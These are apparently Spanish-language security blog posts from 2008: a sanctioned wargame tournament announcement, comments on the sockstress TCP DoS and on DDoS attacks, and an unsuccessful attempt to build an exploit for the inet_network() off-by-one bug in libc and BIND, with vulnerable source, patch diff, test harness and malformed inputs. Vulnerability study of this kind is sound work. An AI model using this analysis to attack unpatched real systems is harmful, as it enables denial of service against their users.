Los siguientes 5, recibiran 15 puntos en warzone, una promocion de 1 rango (no podran pasar a nightmare, los elite).

Todos los demas que pasen la prueba, tendran 10 puntos en warzone, sin promocion de rango.

Hay bonos:
> Modificar el MOTD agregando su nick.
- 20 puntos
> Menor tiempo en pasarlo
- 15 puntos
> Mejor documentacion de como pasarlo*
- 15 puntos (+ cuenta @elhacker.net si no la tienen ya)
* Esta debe ser enviada de forma privada, se le daran los creditos al autor.
> Posiblemente mas, dependiendo de como se desenvuelva el torneo.

El wargame estara online 10 dias, pero podria estar mas tiempo.

En fin, esperamos contar con su presencia! les prometo sera divertido.. mas detalles de la prueba se colocaran en cuanto se acerque la fecha.

Saludos!!

Discutir aqui: http://foro.elhacker.net/warzone/torneo_de_explotacion_de_servidores-t235190.0.html

Ataques a la implementacion de TCP _ Outpost24

2008-10-25T09:15:00.003-05:00

Bien, he estado leyendo sobre el tema, sinceramente les comento que no tengo mucho de haberme enterado de este nuevo DoS en la Pila de TCP ya confirmado por Cisco, que al parecer va a afectar a la mayoría de las implementaciones, Windows, Unix, IOS, ... etc.

Viendo que hay muchos enlaces sin referenciar, hay que agregar el enlace con la información mas Ordenada que es el de fyodor:

http://insecure.org/stf/tcp-dos-attack-explained.html

Ahora la ultima noticia sobre esto marca a Cisco el día 17 donde publica un reporte de alerta de Seguridad Nivel 3 "Sockstress Exploit Tool Exposes Vulnerabilities in TCP Stack Implementations of Multiple Vendors"

También se puede ver que ya tiene su propio CVE: CVE-2008-4609

Bien, pero lo anterior son noticias que ya estaban publicadas y solo se agregan como referencia de lecturas. Ok, el principal punto de partida es la SockStress que usa Cisco, para dar credibilidad a las múltiples Vulnerabilidades en la Pila TCP, bien como menciono sdc se ocupa tener conocimiento de la Pila TCP, los cuales son aportados por sus respectivos RFC’s, Ahora si las vulnerabilidades existen, que ya cisco ha comprobado que si, estas están ahí, en la mayoría de los sistemas Operativos, esto desde hace mucho tiempo.

Buscando en referencias libres (No propietarias) he estado analizado en el código fuente de linux dentro de los archivos tcp.c entre otros, prestando especial atención a los comentarios, he notado algunos comentarios, como que hay que tener cuidado con el tamaño del Window, y otras cosas mas. La verdad no he dado con nada En especifico, pero se que debe de estar ahí, listo para ser encontrado.

Espero que alguien que conozca mas sobre la Pila de TCP nos de una idea mas clara de que estamos buscando y en donde.

Saludos y gracias de antemano por cualquier aporte útil

Ataques DDoS un Fastidio

2008-02-11T22:58:00.002-06:00

Recientemente he leido demasiadas Noticias sobre DDoS y demas, la verdad yo veo estos ataques como un acto de una persona sin Cerebro que lo unico que sabe hacer es Quitar el servicio con sus Estupidos Zombies. Me importa un Comino que sepa Mucho o Poco.

Aqui unos Link sobre lo sucedido:

http://www.error500.net/ataques-ddos-error500

http://www.weblogssl.com/2008/02/07-ataque-de-ddos-a-genbeta

http://blog.meneame.net/2008/02/08/problemas-de-red/

Ahora la comunidad Hacker preocupada y preguntandose como puede ayudar.

http://foro.elhacker.net/index.php/topic,199416.0.html

Ahora sobre seguridad

Citar:
Ya descubrimos bien el tipo de ataque, flood UDP a puertos aleatorios. Hablé con Vicente, procederán a cerrar esos puertos.

Bueno, en parte paquetes UDP, lo cual solucionaron bloqueando los puertos inecesarios.

Citar:
El ataque se hizo desde servidores con Joomla y phpBB, explotaron un bug viejo y conocido que permite incluir ficheros PHP externos.

Ok, estar al dia con las Actualizaciones de seguidad es Basico ya que no queremos estar en la lista de los Zombies Usados como en el ataque anterior. Estar siempre al dia y en contacto con nuestro administrador es Fundamental.

Re: BoF en inet_network(), afecta a Servidor DNS: BIND

2008-02-10T20:46:00.001-06:00

Bien este sera mi ultimo mensaje en este Topic, referente al estudio de este bug, después solo contestare dudas y comentarios.

¿Por que?

Por que debido a que la función en C, es muy Rápida/Eficiente debido a su corto código y gran manejo avanzado de C, genera un código en ensamblador muy Óptimo. Debido a esto y lo poco descubierto hasta ahora, el rendimiento de cualquier aplicacion que use inet_network() como BIND en este caso, no se va a ver tan afectado en gran medida, al menos que se use a manera DDoS o teniendo un gran ancho de Banda puede ser posible.

Sin embargo escribir un exploit/aplicacion que realize el esto se me hace muy Lamer.

Lo ideal seria crear un exploit para obtener acceso al servidor mediante un remote shell o algo parecido, sin embargo como no fue posible encontrar una manera de corromper la pila, tampoco es posible crear el exploit.

Ahora que si alguien quiere realizar dicho exploit/aplicacion solo por practica/conocimiento/interés contra un servidor del cual sea dueño. aquí y en los link presentados esta toda la información necesaria para realizarlo, bueno aparte de sus conocimientos de programacion.

Doy por concluida mi participacion en este tema ya que le he dedicado mucho tiempo en analizar el código, ya me lo se de memoria y se me a hecho infructuoso cumplir mi cometido de realizar un exploit para la función inet_network() vulnerable, sin embargo me queda la satisfacción de haber encontrado una debilidad al código de la función el cual puede representar un pequeño consumo del procesador en cualquier aplicacion que utilice la función mencionada.

Cualquier duda y/o comentario favor de ponerlo en este topic.

Un especial agradecimiento a todos aquellos que me apoyaron en el Topic y por PM Gracias!!

Un saludo a todos.

Re: BoF en inet_network(), afecta a Servidor DNS: BIND

2008-02-06T20:44:00.001-06:00

Bueno volviendo al tema del Estudio de un bug, y posteriormente el la Creacion de un exploit para el mismo. Lamento informarles que no he dado con nada en este bug pero bueno.

Si nos consentramos en lo que sabemos, lo unico que cambio en la version vulnerable del codigo es que el siguiente fracmento de Cofigo cambio de lugar:

Código

 if (pp >= parts + 4 || val > 0xffU)
 return (INADDR_NONE);

De adentro del if, a afuera del mismo:

Version Vulnerable

Código

 if (!digit)
 return (INADDR_NONE);
if (*cp == '.') {
 if (pp >= parts + 4 || val > 0xffU)
  return (INADDR_NONE);
 *pp++ = val, cp++;
 goto again;

Version NO Vulnerable

Código

 if (!digit)
 return (INADDR_NONE);
if (pp >= parts + 4 || val > 0xffU)
 return (INADDR_NONE);
if (*cp == '.') {
 *pp++ = val, cp++;
 goto again;

Ok, aqui lo importante es preguntarnos como cambia el funcionamiento del programa Antes y despues .

Bien segun lo he analizado mientras voy en en el camion, mientras como, y hasta mientras sueño el resultado operativo del codigo sigue siendo el mismo, si no es asi que alguien me lo haga saber y me diga lo ciego que estoy.

Lo unico que noto es que el Procesador se ahorra unas cuantas Instrucciones en caso de que la la Condicion del if sea verdadera, en caso contrareo Todo trabaja Igual. o no

Bueno hasta el momento hago un recuento de lo que he Conseguido hasta el momento.

Es posible Insertarle un valor Invalido para Obtener un Resultado Valido:

Cita de: Anon en 24 Enero 2008, 20:06

Bueno entre las pruebas que estuve haciendo he visto que la aplicacion que tengo de prueba puede recivir cadenas como las que siguen sin colgarse:

Código:

%./test_network 0xfffff00000011.0xfabcd000000003.0xa.0x90
0x11030a90

pero no nos ganamos nada ya que no ponemos nada en la memoria, las ffff se pierden en el corrimiento de bits hacia la izquierda dentro del microprocesador.

Lo cual puede representar un consumo de recursos en el servidor BIND, o el programa que use la funcion inet_network() vulnerale esto solo en caso de que se le envie constantememente cadenas Invalidas como las que mostre obviamente de mayor longitud ya que el Procesador tendria que estar dentro del mismo ciclo mientras le manden estas cadenas.

Un saludo!!

Re: BoF en inet_network(), afecta a Servidor DNS: BIND

2008-01-29T22:01:00.002-06:00

Bien, primero pense que era la variable "val", que sumada al corrimiento de bits que se le hace, podia sobre escribir en la memoria asi que me puse un ejemplo para ver si servia:

Código

int main() {
unsigned long prueba;
long i;
prueba = 0xf;
i = 0;
while(i < 20) {
 printf("Prueba: %i\n",prueba);
 i++;
 prueba = (prueba << 4) + 0xf;
}
return 0;
}

sin embargo no fue asi, me acorde que el corrimiento de Bits se hace en el microprocesador, y el resultado va a la RAM, (Claro que si la variable es register no es asi). estoy medio perdido.

Por ahi he oido que los BoF del tipo Off-By-One no son explotables, sin embargo tambien he visto ejemplos en casos donde tienes algo de control del entorno (local) y las condiciones del BoF son casi Optimas, digamos pila Bien alineada capacidad de meter el shell y etc.. el xploit si puede ser posible.

Esto solo me interesa por el reto de poder hacer que una aplicacion Ejecute tu codigo por gusto memeramente educativo.

Bueno entre las pruebas que estuve haciendo he visto que la aplicacion que tengo de prueba puede recivir cadenas como las que siguen sin colgarse:

Código:

%./test_network 0xfffff00000011.0xfabcd000000003.0xa.0x90
0x11030a90

pero no nos ganamos nada ya que no ponemos nada en la memoria, las ffff se pierden en el corrimiento de bits hacia la izquierda dentro del microprocesador.

Un saludo!!

Re: BoF en inet_network(), afecta a Servidor DNS: BIND

2008-01-28T22:06:00.001-06:00

En la pagina de BIND: BIND Vulnerabilities

Impact:

Applications linked against libbind which call inet_network() with untrusted inputs could lead to a denial-of-service or potentially code execution.

Note that none of the applications shipped with BIND 8 or BIND 9 call inet_network().

Veamos La pagina nos dice nuevamente lo mismo Podemos hacer un DoS al servidor BIND, o podemos ejecutar codigo arbitrareo en el equipo que aloja el servidor.

Ahora

Código:

Index: inet_network.c
diff -u inet_network.c:1.5 inet_network.c:1.6
--- inet_network.c:1.5 Wed Apr 27 04:56:21 2005
+++ inet_network.c Tue Jan 15 04:02:01 2008
@@ -84,9 +84,9 @@
}
if (!digit)
return (INADDR_NONE);
+ if (pp >= parts + 4 || val > 0xffU)
+ return (INADDR_NONE);
if (*cp == '.') {
- if (pp >= parts + 4 || val > 0xffU)
- return (INADDR_NONE);
*pp++ = val, cp++;
goto again;
}

Viendo las diferencias vemos que la version, 1.5 del archivo vulnerable es casi exactamente lo mismo solo movieron de lugar la siguiente Intruccion:

Código

 if (pp >= parts + 4 || val > 0xffU)
 return (INADDR_NONE);

En la version Vulnerable esta dentro del if (*cp == '.') y la version NO vulnerable esta afuera antes de if (*cp == '.'), lo cual me indica que la clave de esto debe estar en saber manejar el formato de entrada con los Puntos '.'. Ya me he impreso el codigo fuente vulnerable y lo estoy analizando paso por paso, ya que no he podido encontrar un input que vulnere el codigo.

BoF en inet_network(), afecta a Servidor DNS: BIND

2008-01-25T16:49:00.001-06:00

Bien, recientemente he empesado a ver en la lista de SECURITY ADVISORIES de FreeBSD, la cual normalmente no veia, sin embargo quiero ser un buen adminsitrador del sistema que utilizo. y estar al dia con las actulizaciones . he visto que hay algunos bugs, ya descubiertos con todo y parche. Obviamente anuncian esto cuando ya se tiene el parche , pero bueno el Motivo de este mensaje es el siguente:

Ver si somos o mas bien soy capaz de construir un exploit para dicha Vulnerabilidad, he hecho exploits para programas sencillos, y BoF bien ubicados, pero de ahi en mas no lo he hecho con aplicaciones complejas.

Por si alguien me quiere ayudar... se lo agradecere de antemano.

Bien los link de bug que me intereso son los siguentes:

En la lista de FreeBSD: FreeBSD-SA-08:02.libc.asc
En securityFocus: CVE-2008-0122
En la pagina de BIND: BIND Vulnerabilities

Ahora para los que no sepen y quieran enterarse, BIND, es un Servidor DNS muy extendido hoy en dia, con la ayuda de este, ustedes pueden entrar a google, o al foro.

Mas informacion en BIND by Wikipedia

La funcion donde se encuentra la falla, es una funcion estandar en libc, esto quiere decir y por si no vieron los primeros Links, FreeBSD no es el unico Afectado por esto, tambien hay muchas Versiones de Linux, UNIX, etc. Y ademas todas las versiones del Servidor BIND, hasta ultima version de 22/01/2008.

La pagina de BIND, considera esto como un Riesgo de Seguridad Bajo, y tienen Razon, el parche ya existe, pero cuantos son los Administradores de Sistemas (me Incluyo) que pocas veces (si no es que ninguna) han aplicado parches de seguridad.

La falla Esta en la funcion inet_network(), la cual es usada por BIND.

he hecho un archivo para testearla, pero no consigo burlarla, pero bueno ya que, aqui esta mi codigo de test, creo yo que asi se puede testear. que alguien con mas experiencia me corrija si es que me equivoco.

test_network.c

Código

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc,char *argv[]) {
char *host = (argc > 1) ? argv[1] : "192.168.0.1";
in_addr_t  net = inet_network(host);
printf("0x%x\n",net);
return 0;
}

Ahora, todos los links que mostre muestran que si tratas de explotar dicho bug, y fallas ocacionarias un DoS a los usuarios legitimos del servidor. Pero si das en el punto exacto podras ejecutar codigo arbitrario en la maquina remota. lo cual te puede permitir el acceso al servidor.

Successfully exploiting this issue may allow attackers to execute arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users.

He instaldo el servidor BIND en una maquina de prueba para ir probando los avances en la aplicacion mas Afectada por este BoF.

Bien ahora estoy analizando la funcion Vulnerable, cabe mencionar que es casi la misma en mi sistema FreeBSD que la que trae incluida el Servidor BIND.

Código

u_long
inet_network(cp)
register const char *cp;
{
register u_long val, base, n, i;
register char c;
u_long parts[4], *pp = parts;
int digit;

again:
val = 0; base = 10; digit = 0;
if (*cp == '0')
 digit = 1, base = 8, cp++;
if (*cp == 'x' || *cp == 'X')
 base = 16, cp++;
while ((c = *cp) != 0) {
 if (isdigit((unsigned char)c)) {
  if (base == 8U && (c == '8' || c == '9'))
   return (INADDR_NONE);
  val = (val * base) + (c - '0');
  cp++;
  digit = 1;
  continue;
 }
 if (base == 16U && isxdigit((unsigned char)c)) {
  val = (val << 4) +
        (c + 10 - (islower((unsigned char)c) ? 'a' : 'A'));
  cp++;
  digit = 1;
  continue;
 }
 break;
}
if (!digit)
 return (INADDR_NONE);
if (*cp == '.') {
 if (pp >= parts + 4 || val > 0xffU)
  return (INADDR_NONE);
 *pp++ = val, cp++;
 goto again;
}
if (*cp && !isspace(*cp&0xff))
 return (INADDR_NONE);
*pp++ = val;
n = pp - parts;
if (n > 4U)
 return (INADDR_NONE);
for (val = 0, i = 0; i < n; i++) {
 val <<= 8;
 val |= parts[i] & 0xff;
}
return (val);
}

Lo que he hecho es lo siguiente.

Instalar BIND en la Computadora de prueba con la opcion -g

Esto es para mayor depuracion del mismo.

Active la creacion de archivos core en el sistema de prueba

Esto es por si la aplicacione se llega a caer en alguna de las pruebas, poder analizar esto mejor.

Agregar a mi ejemplo test_network.c, la funcion Vulnerable.

La agrege con otro nombre esto para poderlo compilar con la opcion -g -static para poder depurarlo sin tener que terner el server abierto.

Asi mi codigo para testear la funcion vulnerable queda asi.

Código

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

in_addr_t inet_networkbuf(const char *cp);

int main(int argc,char *argv[]) {
char *host = (argc > 1) ? argv[1] : "192.168.0.1";
in_addr_t  net = inet_networkbuf(host);
printf("0x%x\n",net);
return 0;
}

in_addr_t
inet_networkbuf(cp)
const char *cp;
{
in_addr_t val, base, n;
char c;
in_addr_t parts[4], *pp = parts;
int i, digit;

again:
val = 0; base = 10; digit = 0;
if (*cp == '0')
 digit = 1, base = 8, cp++;
if (*cp == 'x' || *cp == 'X')
 base = 16, cp++;
while ((c = *cp) != 0) {
 if (isdigit((unsigned char)c)) {
  if (base == 8U && (c == '8' || c == '9'))
   return (INADDR_NONE);
  val = (val * base) + (c - '0');
  cp++;
  digit = 1;
  continue;
 }
 if (base == 16U && isxdigit((unsigned char)c)) {
  val = (val << 4) +
        (c + 10 - (islower((unsigned char)c) ? 'a' : 'A'));
  cp++;
  digit = 1;
  continue;
 }
 break;
}
if (!digit)
 return (INADDR_NONE);
if (*cp == '.') {
 if (pp >= parts + 4 || val > 0xffU)
  return (INADDR_NONE);
 *pp++ = val, cp++;
 goto again;
}
if (*cp && !isspace(*cp&0xff))
 return (INADDR_NONE);
*pp++ = val;
n = pp - parts;
if (n > 4U)
 return (INADDR_NONE);
for (val = 0, i = 0; i < n; i++) {
 val <<= 8;
 val |= parts[i] & 0xff;
}
return (val);
}

Como vemos la unica diferencia entre la funcion existemente en FreeBSD y la del Servidor BIND, es que BIND declara las variables mas utilizadas como register, esto es para que sea mas efeciente. Lo cual me da a entender que va a ser un poco diferente la Explotacion de la funcion inet_network(), dentro de aplicaciones comunes de FreeBSD, que la del Servidor BIND.